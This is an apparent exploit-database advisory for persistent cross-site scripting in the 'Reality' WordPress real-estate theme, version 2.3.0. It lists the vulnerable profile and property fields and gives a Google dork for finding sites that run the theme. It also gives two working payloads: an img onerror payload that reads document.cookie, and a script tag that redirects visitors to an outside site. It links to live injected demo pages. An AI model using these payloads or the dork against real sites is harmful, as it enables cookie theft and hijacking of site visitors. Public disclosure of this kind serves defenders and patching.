Reality | Estate Multipurpose WordPress Theme Persistent XSS

2019.09.09
ru SubversA (RU) ru
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Reality | Estate Multipurpose WordPress Theme Persistent XSS # Google Dork: "/wp-content/themes/reality/framework/" # Date: 08/09/2019 # Exploit Author: SubversA # Vendor Homepage: http://inwavethemes.com/ # Software Link: https://themeforest.net/item/reality-real-estate-wordpress-theme/21627776 # Version: 2.3.0 # Tested on: Parrot OS # CVE : - # CWE : 79 ----[]- Persistent XSS on any property page: -[]---- You need a new user account, then edit any existed property or create a new one, f.e.: http://reality.inwavethemes.com/dashboard/?tab=edit-property&property-id=4457 Vulnerable input fields: 1 - Description & Price -> «PRICE POSTFIX TEXT» and «SECOND PRICE POSTFIX TEXT»; 2 - Additional Information -> «TITLE» and «VALUE»; 3 - Location & Map -> «ADDRESS *». Payload Sample: <img src=x onerror=(alert)(document.cookie)> Live example: http://reality.inwavethemes.com/?post_type=iwp_property&p=4457 ----[]- Persistent XSS on user profile page: -[]---- http://reality.inwavethemes.com/dashboard/?tab=my-profile Vulnerable input fields: Profile Information -> «OFFICE NUMBER», «MOBILE NUMBER» and «FAX NUMBER». Payload Sample: "><script>alert('YOUR FLESH IS AN INSULT TO THE PERFECTION OF THE DIGITAL');location='http://defcon.su';</script> Live example: http://reality.inwavethemes.com/author/asdasd/


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top